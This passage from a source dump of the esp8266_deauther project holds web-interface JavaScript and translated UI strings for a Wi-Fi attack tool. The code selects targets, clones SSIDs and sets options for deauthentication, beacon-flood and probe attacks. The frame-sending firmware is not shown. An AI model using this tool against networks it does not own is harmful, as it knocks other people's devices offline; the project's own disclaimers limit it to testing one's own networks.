getFile("run?cmd=add name \"" + scanJson.stations[id][0] + "\" station " + id);
scanJson.stations[id][2] = "device_" + nameJson.length; // name = device_
nameJson.push([scanJson.stations[id][0], scanJson.stations[id][3], "device_" + nameJson.length, scanJson.aps[scanJson.stations[id][5]][5], scanJson.stations[id][1], false]);
drawScan();
break;
case 2:
getFile("run?cmd=add name device_" + nameJson.length + " -m 00:00:00:00:00:00 -ch 1");
nameJson.push(["00:00:00:00:00:00", "", "device_" + nameJson.length, "", 1, false]);
drawNames();
}
drawNames();
}
function selectAll(type, select) {
switch (type) {
case 0:
getFile("run?cmd=" + (select ? "" : "de") + "select aps");
for (var i = 0; i < scanJson.aps.length; i++) scanJson.aps[i][7] = select;
drawScan();
break;
case 1:
getFile("run?cmd=" + (select ? "" : "de") + "select stations");
for (var i = 0; i < scanJson.stations.length; i++) scanJson.stations[i][7] = select;
drawScan();
break;
case 2:
getFile("run?cmd=" + (select ? "" : "de") + "select names");
for (var i = 0; i < nameJson.length; i++) nameJson[i][5] = select;
drawNames();
}
} |
JavaScript | esp8266_deauther-2/web_interface/js/settings.js | /* This software is licensed under the MIT License: https://github.com/spacehuhntech/esp8266_deauther */
var settingsJson = {};
function load() {
getFile("settings.json", function (res) {
settingsJson = JSON.parse(res);
showMessage("connected");
draw();
});
}
function draw() {
var html = "";
for (var key in settingsJson) {
key = esc(key);
if (settingsJson.hasOwnProperty(key)) {
html += "<div class='row'>"
+ "<div class='col-6'>"
+ "<label class='settingName " + (typeof settingsJson[key] == "boolean" ? "labelFix" : "") + "' for='" + key + "'>" + key + ":</label>"
+ "</div>"
+ "<div class='col-6'>";
if (typeof settingsJson[key] == "boolean") {
html += "<label class='checkBoxContainer'><input type='checkbox' name='" + key + "' " + (settingsJson[key] ? "checked" : "") + " onchange='save(\"" + key + "\",!settingsJson[\"" + key + "\"])'><span class='checkmark'></span></label>";
} else if (typeof settingsJson[key] == "number") {
html += "<input type='number' name='" + key + "' value=" + settingsJson[key] + " onchange='save(\"" + key + "\",parseInt(this.value))'>";
} else if (typeof settingsJson[key] == "string") {
html += "<input type='text' name='" + key + "' value='" + settingsJson[key].toString() + "' " + (key == "version" ? "readonly" : "") + " onchange='save(\"" + key + "\",this.value)'>";
}
html += "</div>"
+ "</div>"
+ "<div class='row'>"
+ "<div class='col-12'>"
+ "<p>" + lang("setting_" + key) + "</p>"
+ "<hr>"
+ "</div>"
+ "</div>";
}
}
getE("settingsList").innerHTML = html;
}
function save(key, value) {
if (key) {
settingsJson[key] = value;
getFile("run?cmd=set " + key + " \"" + value + "\"");
} else {
getFile("run?cmd=save settings", function (res) {
load();
});
}
} |
JavaScript | esp8266_deauther-2/web_interface/js/site.js | /* This software is licensed under the MIT License: https://github.com/spacehuhntech/esp8266_deauther */
var langJson = {};
function getE(name) {
return document.getElementById(name);
}
function esc(str) {
if (str) {
return str.toString()
.replace(/&/g, '&')
.replace(/</g, '<')
.replace(/>/g, '>')
.replace(/\"/g, '"')
.replace(/\'/g, ''')
.replace(/\//g, '/');
}
return "";
}
function convertLineBreaks(str) {
if (str) {
str = str.toString();
str = str.replace(/(?:\r\n|\r|\n)/g, '<br>');
return str;
}
return "";
}
function showMessage(msg) {
if (msg.startsWith("ERROR")) {
getE("status").style.backgroundColor = "#d33";
getE("status").innerHTML = "disconnected";
console.error("disconnected (" + msg + ")");
} else if (msg.startsWith("LOADING")) {
getE("status").style.backgroundColor = "#fc0";
getE("status").innerHTML = "loading...";
} else {
getE("status").style.backgroundColor = "#3c5";
getE("status").innerHTML = "connected";
console.log("" + msg + "");
}
}
function getFile(adr, callback, timeout, method, onTimeout, onError) {
/* fallback stuff */
if (adr === undefined) return;
if (callback === undefined) callback = function () { };
if (timeout === undefined) timeout = 8000;
if (method === undefined) method = "GET";
if (onTimeout === undefined) {
onTimeout = function () {
showMessage("ERROR: timeout loading file " + adr);
};
}
if (onError === undefined) {
onError = function () {
showMessage("ERROR: loading file: " + adr);
};
}
/* create request */
var request = new XMLHttpRequest();
/* set parameter for request */
request.open(method, encodeURI(adr), true);
request.timeout = timeout;
request.ontimeout = onTimeout;
request.onerror = onError;
request.overrideMimeType("application/json");
request.onreadystatechange = function () {
if (this.readyState == 4) {
if (this.status == 200) {
showMessage("CONNECTED");
callback(this.responseText);
}
}
};
showMessage("LOADING");
/* send request */
request.send();
console.log(adr);
}
function lang(key) {
return convertLineBreaks(esc(langJson[key]));
}
function parseLang(fileStr) {
langJson = JSON.parse(fileStr);
if (langJson["lang"] != "en") {// no need to update the HTML
var elements = document.querySelectorAll("[data-translate]");
for (i = 0; i < elements.length; i++) {
var element = elements[i];
element.innerHTML = lang(element.getAttribute("data-translate"));
}
}
document.querySelector('html').setAttribute("lang", langJson["lang"]);
if (typeof load !== 'undefined') load();
}
function loadLang() {
var language = "default"; //navigator.language.slice(0, 2);
getFile("lang/" + language + ".lang",
parseLang,
2000,
"GET",
function () {
getFile("lang/en.lang", parseLang);
}, function () {
getFile("lang/en.lang", parseLang);
}
);
}
window.addEventListener('load', function () {
getE("status").style.backgroundColor = "#3c5";
getE("status").innerHTML = "connected";
}); |
JavaScript | esp8266_deauther-2/web_interface/js/ssids.js | /* This software is licensed under the MIT License: https://github.com/spacehuhntech/esp8266_deauther */
var ssidJson = { "random": false, "ssids": [] };
function load() {
getFile("run?cmd=save ssids", function () {
getFile("ssids.json", function (res) {
ssidJson = JSON.parse(res);
showMessage("connected");
draw();
});
});
}
function draw() {
var html;
html = "<tr>"
+ "<th class='id'></th>"
+ "<th class='ssid'></th>"
+ "<th class='lock'></th>"
+ "<th class='save'></th>"
+ "<th class='remove'></th>"
+ "</tr>";
for (var i = 0; i < ssidJson.ssids.length; i++) {
html += "<tr>"
+ "<td class='id'>" + i + "</td>" // ID
+ "<td class='ssid' contenteditable='true' id='ssid_" + i + "'>" + esc(ssidJson.ssids[i][0].substring(0, ssidJson.ssids[i][2])) + "</td>" // SSID
+ "<td class='lock clickable' onclick='changeEnc(" + i + ")' id='enc_" + i + "'>" + (ssidJson.ssids[i][1] ? "🔒" : "-") + "</td>" // Enc
+ "<td class='save'><button class='green' onclick='save(" + i + ")'>" + lang("save") + "</button></td>" // Save
+ "<td class='remove'><button class='red' onclick='remove(" + i + ")'>X</button></td>" // Remove
+ "</tr>";
}
getE("randomBtn").innerHTML = ssidJson.random ? lang("disable_random") : lang("enable_random");
getE("ssidTable").innerHTML = html;
}
function remove(id) {
ssidJson.ssids.splice(id, 1);
getFile("run?cmd=remove ssid " + id);
draw();
}
function add() {
var ssidStr = getE("ssid").value;
var wpa2 = getE("enc").checked;
var clones = getE("ssidNum").value;
var force = getE("overwrite").checked;
if (ssidStr.length > 0) {
var cmdStr = "add ssid \"" + ssidStr + "\"" + (force ? " -f" : " ") + " -cl " + clones;
if (wpa2) cmdStr += " -wpa2";
getFile("run?cmd=" + cmdStr);
for (var i = 0; i < clones; i++) {
if (ssidJson.ssids.length >= 60) ssidJson.ssids.splice(0, 1);
ssidJson.ssids.push([ssidStr, wpa2]);
}
draw();
}
}
function enableRandom() {
if (ssidJson.random) {
getFile("run?cmd=disable random", function () {
load();
});
} else {
getFile("run?cmd=enable random " + getE("interval").value, function () {
load();
});
}
}
function disableRandom() {
}
function addSelected() {
getFile("run?cmd=add ssid -s" + (getE("overwrite").checked ? " -f" : ""));
}
function changeEnc(id) {
ssidJson.ssids[id][1] = !ssidJson.ssids[id][1];
draw();
save(id);
}
function removeAll() {
ssidJson.ssids = [];
getFile("run?cmd=remove ssids");
draw();
}
function save(id) {
var name = getE("ssid_" + id).innerHTML.replace("<br>", "").substring(0, 32);
var wpa2 = ssidJson.ssids[id][1];
ssidJson.ssids[id] = [name, wpa2];
getFile("run?cmd=replace ssid " + id + " -n \"" + name + "\" " + (wpa2 ? "-wpa2" : ""));
} |
esp8266_deauther-2/web_interface/lang/cn.lang | {
"lang": "cn",
"warning": "注意!",
"disclaimer": "该项目仅用于个人学习和研究使用\nESP8266及其SDK都不是为此目的而设计或构建的。可能会有 Bug 出现!\n请仅在自己的网络和设备上使用!\n本项目使用IEEE 802.11标准中描述的有效Wi-Fi帧,不会阻止或破坏任何频带。\n使用前请检查您的国家的法律法规。\n\n请不要将这个项目称为“干扰器”,这完全破坏了这个项目的真正目的!\n如果你这样做,它只能证明你不了解这个项目意味着什么。\n请勿用于商业用途,或为了自身利益发布该项目的消息,这只能说明你不尊重知识产权,以及背后的社区和为了更好的WiFi标准的斗争。\n\n详情请访问:",
"disclaimer-button": "我已阅读并明白上述注意事项。",
"reload": "刷新",
"scan": "扫描",
"ssids": "SSIDs",
"attacks": "攻击",
"settings": "设置",
"info": "关于",
"info_span": "注意: ",
"all": "全部",
"channel": "信道",
"devices": "保存的设备",
"select_all": "全选",
"deselect_all": "全不选",
"remove_all": "移除全部",
"station_scan_time": "Station扫描时间",
"new": "新建",
"save": "保存",
"add": "添加",
"add_selected": "克隆所选接入点",
"overwrite": "覆盖",
"time_interval": "时间间隔",
"number": "数量",
"targets": "目标",
"scan_info": "- 点击扫描并等待,直到主板上的蓝色LED指示灯熄灭(或变为绿色),然后点击刷新。\n- 在Station扫描期间,Web界面将不可用,您可能需要重新连接!\n- 请只选择一个目标!\n",
"ssids_info": "- 此SSID列表用于信标(beacon)和探测(probe)攻击。\n- 每个SSID最多可以有32个字符。\n- 修改SSID后不要忘记点击保存。\n- 您需要在克隆SSID后点击刷新。\n",
"attack_info": "- 您在开始攻击时可能会失去连接!\n- 你需要为取消验证洪水攻击(deauth)攻击选择一个目标。\n- 您需要保存一个SSID来进行信标和探测攻击。\n- 点击刷新以刷新数据包速率。\n",
"settings_info": "- 某些设置需要重启后才能生效。\n- 修改设置后请务必点击保存以生效。\n",
"info_disclaimer": "如果发生了不可预计的错误,请重载网页并使用串口监视器以进一步调试。",
"start_stop": "开始 / 停止",
"start": "开始",
"stop": "停止",
"wifi_off": "WiFi关闭",
"reboot": "重启",
"reset": "重置",
"enable_random": "开启随机模式",
"disable_random": "关闭随机模式",
"random_desc": "启用随机模式以在给定时间间隔内生成随机的SSID列表",
"deauth_desc": "通过向您选择的接入点和客户端设备发送解除认证帧来关闭WiFi设备的连接。\n因为很多设备不使用802.11w-2009标准来抵御这种攻击。\n- 请只选择一个目标!当您开始攻击的不同信道上的多个目标时,它将在这些信道之间快速切换,届时您将无法重新连接到此Web界面。\n",
"beacon_desc": "信标帧(Beacon)数据包用于宣告接入点。通过不断发送信标帧数据包,看起来就像您创建了新的WiFi网络。\n您可以通过SSID指定网络名称。",
"probe_desc": "探测请求帧由客户端设备发送,以询问一个已知网络是否在附近。\n通过请求您在SSID列表中指定的网络,以此来混淆WiFi跟踪器。\n您可能不会在家庭网络中看到此次攻击的任何影响。",
"setting_version": "版本号,比如说 v2.0.1\n这个选项只能在源代码中更改",
"setting_ssid" : "Wi-Fi 热点 SSID (如果已启用)。\nSSID长度必须在8到31个字符之间。",
"setting_password": "Wi-Fi 密码(如果已启用)。\n密码长度必须在8到31个字符之间。",
"setting_channel": "启动时默认使用的信道。",
"setting_hidden": "隐藏接入点的SSID。",
"setting_captivePortal": "启用captive portal(无线认证系统)。",
"setting_autosave": "自动保存SSIDs、设备名和设置。",
"setting_autosavetime": "自动保存的时间间隔(ms)。",
"setting_display": "启用OLED界面。",
"setting_displayTimeout": "OLED超时时间(s)。\n若需要关闭超时,请设置成0。",
"setting_serial": "启用串口控制界面.\n推荐不要关闭。",
"setting_serialEcho": "开启串口输入回显",
"setting_web": "启用Web界面。",
"settings_webSpiffs": "对所有文件启用 SPIFFS",
"setting_led": "启用 (RGB) LED灯。",
"setting_maxch": "扫描的最大信道。\nUS = 11, EU = 13, Japan = 14.",
"setting_macAP": "接入点模式下的MAC地址。\n只有在接入点模式开启时才会改变MAC地址。",
"setting_macSt": "客户端模式下的MAC地址。\n只有在客户端模式开启时才会改变MAC地址。",
"setting_chtime": "扫描第一个信道到第二个信道的时间间隔(ms)(只有在信道跳变开启时有效)。",
"setting_minDeauths": "扫描最小解除认证攻击帧的数量,改变取消验证洪水攻击模式下的LED。",
"setting_attacktimeout": "指定时间(s)后自动停止攻击。\n设定为0以关闭。",
"setting_forcepackets": "发送多少数据包来用于攻击。\n如果要在繁忙区域达到更好的数据包速率,则将此值设置得更高。\n小心,这个设置可能使设备更慢或者更不稳定。\n最大值为255!",
"setting_deauthspertarget": "发送给每个目标的解除关联帧与解除认证帧。",
"setting_deauthReason": "解除认证帧的原因代码。告知目标设备其为什么连接会被关闭。",
"setting_beaconchannel": "如果启用,在运行信标帧(Beacon)攻击时,会在不同信道上广播。",
"setting_beaconInterval": "启用时,每隔1s会发送一次信标帧(Beacon)。关闭时,时间间隔会变成100ms。\n一个长的时间间隔意味着更稳定和更高效的数据包,但在扫描客户端和接入点时会花费您更多时间。",
"setting_randomTX": "启用随机传输功率来发送信标帧和探测请求帧。",
"setting_probesPerSSID": "探测攻击模式下发送给每个SSID的探测请求帧。",
"setting_lang": "Web界面的默认语言。\n请确认语言文件是否存在!"
} |
|
esp8266_deauther-2/web_interface/lang/cs.lang | {
"lang": "cs",
"warning": "VAROVÁNÍ",
"disclaimer": "Tento projekt slouží pouze pro testovací a edukační využití.\nESP8266, nebo jeho SDK není určeno pro toto použití, proto se mohou vyskytnout chyby!\n\nPoužijte tento projekt jen proti vlastním zařízením a sítím!\n\nPoužíváme validní Wi-Fi rámce popsané v IEEE 802.11 standardu. Neblokujeme, ani nezasahujeme do jiných frekvencí.\nPřed použitím si zkontrolujte omezení ve vaší zemi.\n\nProsím neodkazujte na tento projekt jako na \"rušičku\", nebo \"jammer\", podkopává to reálný význam tohoto projektu!\nPokud tak budete nadále odkazovat, jen to ukazuje, že jste nic nepochopili.\nPublikování obsahu o tomto projektu bez řádného vysvětlení ukazuje, že to děláte pouze pro kliknutí, slávu, peníze a nemáte žádný respekt k duševnímu vlastnictví, komunitě za ním a boji za lepší standard WiFi.\n\nPro více informací navštivte:",
"disclaimer-button": "Přečetl jsem a pochopil výše uvedené oznámení",
"reload": "Obnovit",
"scan": "Skenovat",
"ssids": "SSID",
"attacks": "Útoky",
"settings": "Nastavení",
"info": "Info",
"info_span": "INFO: ",
"all": "Vše",
"channel": "Kanál",
"devices": "Uložená zařízení",
"select_all": "Označit vše",
"deselect_all": "Odoznačit vše",
"remove_all": "Odstranit vše",
"station_scan_time": "Čas skenování stanice",
"new": "Nový",
"save": "Uložit",
"add": "Přidat",
"add_selected": "Klonovat vybrané stanice",
"overwrite": "Přepsat",
"time_interval": "Časový interval",
"number": "Číslo",
"targets": "Cíle",
"scan_info": "- Klikněte na Skenovat a vyčkejte až se modrá LED vypne (nebo se změní na zelenou), poté klikněte na Obnovit.\n- Webové rozhraní nebude během skenu dostupné. Budete se muset připojit znovu!\n- Vyberte jenom jeden cíl!\n",
"ssids_info": "- Pro útok bude využit tento seznam SSID.\n- Každé SSID může mít do 32 znaků.\n- Po editaci nezapomeňte kliknout na Uložit.\n- Po klonování SSID budete muset kliknout na Obnovit.\n",
"attack_info": "- Při zahájení útoku možná ztratíte připojení!\n- Musíte vybrat cíl.\n- Pro útok potřebujete uložené SSID.\n- Klikněte na Obnovit pro obnovení rychlosti paketů.\n",
"settings_info": "- Některá nastavení vyžadují restart.\n- Pro aplikování změn klikněte na Uložit.\n",
"info_disclaimer": "V případě neočekávané chyby obnovte stránku a zkontrolujte sériové rozhraní pro další ladění.",
"start_stop": "START / STOP",
"start": "START",
"stop": "STOP",
"wifi_off": "WiFi Off",
"reboot": "Restartovat",
"reset": "Resetovat",
"enable_random": "Zapnout režim náhody",
"disable_random": "Vypnout režim náhody",
"random_desc": "Zapnout generování náhodného SSID seznamu.",
"deauth_desc": "Uzavře spojení WIFI zařízení odesláním deauth paketů klientům a AP, které jste si vybrali.\nToto je možné, protože většina zařízení neimplementuje 802.11w-2009 standard, který proti tomuto útoku brání.\n- Vyberte jenom jeden cíl! Pokud vyberete více cílů, které jsou na jíných kanálech a spustíte útok, tak ztratíte možnost se připojit do webového rozhraní.\n",
"beacon_desc": "Pro zviditelnění jsou použity beacon pakety. Odesíláním těchto paketů výtváříte dojem nových sítí.\nJména můžete specifikovat v sekci SSID.",
"probe_desc": "Probe požadavky jsou odesílány klienty, pro zjištění, jestli není blízko známá síť.\nPoužijte tento útok pro zmatení WIFI skenerů.\nVe vaší domácí sítí pravděpodobně nezaznamenáte žádné výsledky.",
"setting_version": "Číslo verze, tj. v2.0.\nMůže být změněno pouze ve zdrojovém kódu.",
"setting_ssid" : "SSID přístupového bodu AP (je-li zapnuto).\nDélka musí být mezi 1 a 31 znaky.",
"setting_password": "Heslo přístupového bodu AP (je-li zapnuto).\nDélka musí být mezi 8 a 31 znaky.",
"setting_channel": "Výchozí WIFI kanál, který bude použit při startu.",
"setting_hidden": "Skryje přístupový bod pro webové rozhraní (je-li zapnuto).",
"setting_captivePortal": "Aktivuje captive portal pro webové rozhraní (je-li zapnuto).",
"setting_autosave": "Aktivuje automatické ukládání SSID, jmen zařízení and nastavení.",
"setting_autosavetime": "Časový interval pro automatické ukládání v milisekundách.",
"setting_display": "Aktivuje rozhraní displaye.",
"setting_displayTimeout": "Čas v sekundách za který se display po nečinnosti automaticky vypne.\nPro vypnutí časovače použijte 0.",
"setting_serial": "Aktivuje sériové rozhraní.\nNení doporučeno ho vypínat!",
"setting_serialEcho": "Aktivuje odezvu (echo) pro každý řádek v sériové konzoli.",
"setting_web": "Aktivuje webové rozhraní.",
"settings_webSpiffs": "Zapnout SPIFFS pro všechny webové soubory.",
"setting_led": "Aktivuje (RGB) LED.",
"setting_maxch": "Max. kanál.\nUS = 11, EU = 13, Japonsko = 14.",
"setting_macAP": "MAC adresa v AP módu.\nMAC adresa bude nahrazena, pokud je AP mód aktivní.",
"setting_macSt": "MAC adresa v módu stanice.\nMAC adresa bude nahrazena, pokud je mód stanice aktivní.",
"setting_chtime": "Čas pro skenování jednoho kanálu v milisekundách (pokud je zapnuto přeskakování kanálů).",
"setting_minDeauths": "Minimální počet odhlašovacích rámců pro změnu LED indikátoru.",
"setting_attacktimeout": "Útok se automaticky zastaví po zadaném čase (v sekundách).\nPro vypnutí časovače nastavte 0.",
"setting_forcepackets": "Počet pokusů pro odeslání paketu.\nNastavte větší hodnotu, pokud potřebujete lepší výsledky v rušných prostředích.\nToto nastavení může vést ke zpomalení zařízení a nestabilitě.\nMaximální hodnota je 255!",
"setting_deauthspertarget": "Kolik deauth paketů bude odesláno každému cíli.",
"setting_deauthReason": "Kód, který určuje důvod odhlášení klientů za sítě.",
"setting_beaconchannel": "Pokud aktivní, beacon pakety budou odesílány na odlišných kanálech.",
"setting_beaconInterval": "Pokud aktivní, beacon interval bude 1s. Pokud ne, interval bude 100ms.\nDelší interval znamená větší stabilitu, ale skenování může trvat déle.",
"setting_randomTX": "Aktivuje náhodný vysílací výkon pro každý packet.",
"setting_probesPerSSID": "Kolik probe paketů bude odesláno k SSID.",
"setting_lang": "Výchozí jazyk pro webové rozhraní.\nUjistěte se, že definiční soubor jazyka existuje!"
} |
|
esp8266_deauther-2/web_interface/lang/da.lang | {
"lang": "da",
"warning": "ADVARSEL",
"disclaimer": "Dette projekt er et bevis for koncept og er til testning og uddandelses brug.\nHverken ESP82266, eller dens SDK er ment eller bygget for dette formål. Fejl kan opstå!\n\nBrug det kun mod egne trådløse netværk og enheder!\n\nDen anvender godkendte WiFi pakker som beskrevet i IEEE 802.11 standard og den blokere ikke eller forstyre frekvenser.\nAltid følg dit lands regulationer og lov krav før den tages i brug.\n\nVær venlig ikke at referere til dette projekt som en \"Jammer\", det underminere projektet virkelige hensigt!\nHvis du alligevel gør så beviser det blot at du ikke har forstået hvad dette projekt virkelig omhandler.\nUdgivelse af indhold omkring dette uden den rette forståelse og forklaring viser at du kun gør dette for kliks, berømthed eller penge og ikke har respekt for intellektuel ejendom, folket bag det samt kampen for en bedre WiFi standard.\n\nFor mere information besøg:",
"disclaimer-button": "Jeg har læst og forstået overstående",
"reload": "Genindlæs",
"scan": "Scanning",
"ssids": "SSIDer",
"attacks": "Angreb",
"settings": "Indstillinger",
"info": "Info",
"info_span": "INFO: ",
"all": "Alle",
"channel": "Kanal",
"devices": "Gemte enheder",
"select_all": "Vælg alle",
"deselect_all": "Afvælg alle",
"remove_all": "Fjern alle",
"station_scan_time": "Station scanning tid",
"new": "Ny",
"save": "Gem",
"add": "Tilføj",
"add_selected": "Klon valgte APer",
"overwrite": "Overskriv",
"time_interval": "Tids interval",
"number": "Nummer",
"targets": "Mål",
"scan_info": "- Klik Scanning og vent på det blå LED på kortet slukker (eller skifter til grøn), derefter klik på Genindlæs.\n- Web siden vil være ubrugelig mens der scannes for stationer og du bliver nød til at forbinde igen!\n- Vælg venligts kun ét mål!\n",
"ssids_info": "- SSID listen bruges til beacon og probe angreb.\n- Hvert SSID kan være op til 32 karakter.\n- Husk at klikke Gem når du har rettet et SSID.\n- Du skal klikke genindlæs efter at havde klonet et SSID.\n",
"attack_info": "- Du kan mist eforbindelsen når du starter et angreb!\n- Du skal vælge et mål for deauth-angreb.\n- Du skal bruge et gemt SSID navn for beacon og probe angreb.\n- Klik genindlæs for at opfriske pakke hastigheden.\n",
"settings_info": "- Nogle indstillinger kræver genstart.\n- Klik gem for at sikre indstillingerne bliver aktiveret.\n",
"info_disclaimer": "I tilfælde af en uventet fejl, genindlæs siden og kik på serial monitor for fejl søgning.",
"start_stop": "START / STOP",
"start": "START",
"stop": "STOP",
"wifi_off": "WiFi Sluk",
"reboot": "Genstart",
"reset": "Nulstil",
"enable_random": "Aktiver tilfældig mode",
"disable_random": "Deaktiver tilfældig mode",
"random_desc": "Aktiver tilfældig mode for at generere en tilfældigt SSID liste i det angivet interval.",
"deauth_desc": "Lukker for forbindelsen til forbundne WiFi enheder ved at sende deauthentication pakker til et access-point og valgte klienter.\nDette er kun mulig da en stor del enheder ikke benytter 802.11w-2009 standarden som tilbyder beskyttelse mod dette angreb.\n- Vælg kun et mål! Når du vælger mål fordelt på forskellige kanaler og starter angrebet så vil den hoppe mellem kanalerne og det vil ikke være muligt at få forbindelse til web siden igen.\n",
"beacon_desc": "Beacon pakker er brugt til at annoncere access-points. Ved at sende beacon pakker ud kontinuerligt kan du få det til at se ud til du har oprettet WiFi netværk.\nDu kan angive et navn under SSIDer",
"probe_desc": "Prope forspørgelser er sendt af klientens enheder for at forspørge efter kendte netværk i nærheden.\nBrug dette angreb for at forvire WiFi søgere ved at forspørge efter netværk angivet i SSID listen.\nDette angreb vil ikke gøre meget ved dit nuværende netværk.",
"setting_version": "Version nummer, f.eks. v2.0.\nDenne indstilling kan kun ændres i kilde koden.",
"setting_ssid" : "SSID af et accesspoint (hvis aktiveret).\nLængden skal være mellem 1 og 31 karakter.",
"setting_password": "Kodeord for accesspoint (hvis aktiveret).\nLængden skal være mellem 8 og 31 karakter.",
"setting_channel": "Standard Wifi kanal brugt fra start.",
"setting_hidden": "Gemmer accesspoint fra SSID listen hvis brugt til web siden (hvis aktiveret).",
"setting_captivePortal": "Aktiver captive-portal for accespoint (hvis aktiveret).",
"setting_autosave": "Aktiver automatisk gemning af SSIDer, enhed navne og indstillinger.",
"setting_autosavetime": "Tids interval for automatisk gemning i millisekunder.",
"setting_display": "Aktiver skærm brugerflade.",
"setting_displayTimeout": "Tid i sekunder hvorefter skærmen slukker ved inaktivitet.\nFor at fjerne sæt tid til 0.",
"setting_serial": "Aktiver serial brugerflade.\nDet er rekommenderet ikke at slå fra!",
"setting_serialEcho": "Aktiver echo for alle indkommende beskeder via serial.",
"setting_web": "Aktiver web brugerflade.",
"setting_webSpiffs": "Aktiver SPIFFS for alle web filer.",
"setting_led": "Aktiver (RGB) LED funktioner.",
"setting_maxch": "Max. kanal at scanne på.\nUS = 11, EU = 13, Japan = 14.",
"setting_macAP": "MAC adresse brugt til access point mode.\nVær opmærksom på MAC adressen vil kun blive overskrevet internt når accesspoint mode er aktiveret.",
"setting_macSt": "MAC adresse brugt til station mode.\nVær opmærksom på MAC adressen vil kun blive overskrevet internt når station mode er aktiveret.",
"setting_chtime": "Tid for scanning af én kanal før den går videre til den næste i millisekunder (kun aktiv hvis kanal-hopping er aktivt).",
"setting_minDeauths": "Minimum nummer af deauthentication pakker ved scanning for at skifte LED farve i deauth mode.",
"setting_attacktimeout": "Efter x antal tid (i sekunder) stopper angrebet automatisk.\nSæt til 0 for aldrig at stoppe.",
"setting_forcepackets": "HVor mange forsøg ved udsendelse af pakke.\nSæt højere i overfyldte kanal områder for bedre resultat.\nDenne indstilling kan resultere i ustabilitet.\nMaks værdi er 255!",
"setting_deauthspertarget": "Hvor mange deauthentication og disassociation pakker er sendt ud for hvert mål.",
"setting_deauthReason": "Begrundelsen sendt til mål ved deauth pakker for at forklre hvorfor de er blevet afbrudt.",
"setting_beaconchannel": "Hvis aktiveret, vil sende alle pakker på andre kanaler når den laver beacon angreb.",
"setting_beaconInterval": "Hvis sat til sandt, beacons sendes ud hvert sekund. Hvis sat til falsk, vil intervallet være 100ms.\nEt længere interval betyder mere stabilitet og mindre spamming, men enhederk an være længere om at se dit SSID.",
"setting_randomTX": "Aktivere tilfældig transmissions kraft for udsendelse af beacon og probe forspørgelses pakker.",
"setting_probesPerSSID": "Hvor mange probe forspørgselser pakker er sendt for hver SSID.",
"setting_lang": "Standart sprog for web brugerfladen.\nVær sikker på sprog filen eksitere!"
} |
|
esp8266_deauther-2/web_interface/lang/de.lang | {
"lang": "de",
"warning": "WARNUNG",
"disclaimer": "Dieses Proof-of-Concept-Projekt ist zum Lernen und Testen.\nWeder der ESP8266, noch das SDK sind für solche Zwecke gemacht. Fehler können auftreten!\n\nBenutze es nur gegen eigene Netzwerke und Geräte!\n\nEs werden valide Wi-Fi-Frames nach IEEE 802.11 verwendet und keine Frequenzen gestört oder blockiert.\n\nBitte bezeichne dieses Projekt nicht als \"Jammer\" oder \"Störsender\", dass untergräbt den Sinn dieses Projektes!\nWenn du es doch tust, zeigt es nur, dass du nichts von dem, wofür das Projekt steht, verstanden hast.\nDie Veröffentlichung von Inhalten hierzu ohne entsprechende Erläuterung zeigt, dass du es nur für Aufmerksamkeit, Klicks und/oder Geld machst und keinen Respekt für geistiges Eigentum, die Gemeinschaft dahinter und den Kampf für einen besseren Wi-Fi-Standard hast.\n\nFür mehr Informationen, besuche:",
"disclaimer-button": "Ich habe den Hinweis gelesen und verstanden",
"reload": "Neu laden",
"scan": "Scan",
"ssids": "SSIDs",
"attacks": "Attacken",
"settings": "Einstellungen",
"info": "Info",
"info_span": "INFO: ",
"all": "Alle",
"channel": "Kanal",
"devices": "Gespeicherte Geräte",
"select_all": "Alle auswählen",
"deselect_all": "Auswahl aufheben",
"remove_all": "Alle entfernen",
"station_scan_time": "Station-Scan-Zeit",
"new": "Neu",
"save": "Speichern",
"add": "Hinzufügen",
"add_selected": "Klone ausgewählte APs",
"overwrite": "Überschreiben",
"time_interval": "Zeitintervall",
"number": "Anzahl",
"targets": "Ziele",
"scan_info": "- Drücke auf \"Scan\" und warte bis sich die blaue LED auf deinem Board ausschaltet (oder grün wird), dann drücke \"Neu laden\".\n- Das Webinterface schaltet sich während eines Station-Scans aus und du musst dich neu verbinden!\n- Bitte wähle nur ein Ziel aus!\n",
"ssids_info": "- Die SSID-Liste wird für die Beacon- und Probe-Attacken verwendet.\n- Jede SSID kann bis zu 32 Zeichen haben.\n- Vergiss nicht auf Speichern zu klicken nachdem du eine Änderung vorgenommen hast.\n- Du musst auf \"Neu laden\" klicken nachdem du SSIDs geklont hast.\n",
"attack_info": "- Die Verbindung kann beim Starten einer Attacke unterbrochen gehen!\n- Für Deauth-Attacken wird ein ausgewähltes Ziel benötigt.\n- Für Beacon- und Probe-Attacken werden gespeicherte SSIDs benötigt.\n- Klicke \"Neu laden\" um die Paketrate zu aktualisieren.\n",
"settings_info": "- Einige Einstellungen benötigen einen Neustart.\n- Klicke \"Speichern\", um sicherzustellen, dass deine Änderungen übernommen werden.\n",
"info_disclaimer": "Im Falle eines unerwarteten Fehlers lade die Seite erneut und schaue auf den Serial-Monitor für weiteres Debugging.",
"start_stop": "START / STOPP",
"start": "START",
"stop": "STOPP",
"wifi_off": "WiFi aus",
"reboot": "Neu starten",
"reset": "Reset",
"enable_random": "Random Mode EIN",
"disable_random": "Random Mode AUS",
"random_desc": "Schalte den Random-Mode ein, um eine zufällige SSID-Liste im gegebenen Intervall automatisch zu generieren.",
"deauth_desc": "Schließt die Verbindung von WiFi-Geräten durch das Senden von Deauthentication-Frames zu den ausgewählten Geräten.\nDas ist nur möglich, da viele Geräte nicht den 802.11w-2009-Standard nutzen. Dieser bietet einen Schutz gegen solche Attacken.\nBitte wähle nur ein Ziel aus! Bei mehreren Zielen auf verschiedenen Kanälen muss das Gerät ständig den Kanal wechseln und du wirst das Webinterface nicht mehr nutzen können.",
"beacon_desc": "Beacon-Pakete werden benutzt, um auf Netzwerke aufmerksam zu machen. Durch das ständige Senden von solchen Paketen macht es den Anschein, Du hättest neue WiFi-Netzwerke erstellt.\nDu kannst die Netzwerknamen in der SSID-Liste einstellen.",
"probe_desc": "Probe-Requests werden von Client-Geräten gesendet, um nach bekannten Netzwerken in Reichweite zu fragen.\nBenutze diese Attacke um WiFi-Trackers zu verwirren, indem Du ständig nach Netzwerken aus der SSID-Liste fragst.\nEs ist unwahrscheinlich, dass diese Attacke merkbare Auswirkungen auf Dein Heimnetzwerk hat.",
"setting_version": "Versionsnummer, z.B. v2.0.\nDiese Einstellung kann nur im Quellcode verändert werden.",
"setting_ssid" : "SSID des Access-Points, benutzt für das Webinterface (wenn aktiviert).\nDie Länge muss zwischen 1 und 31 Zeichen sein.",
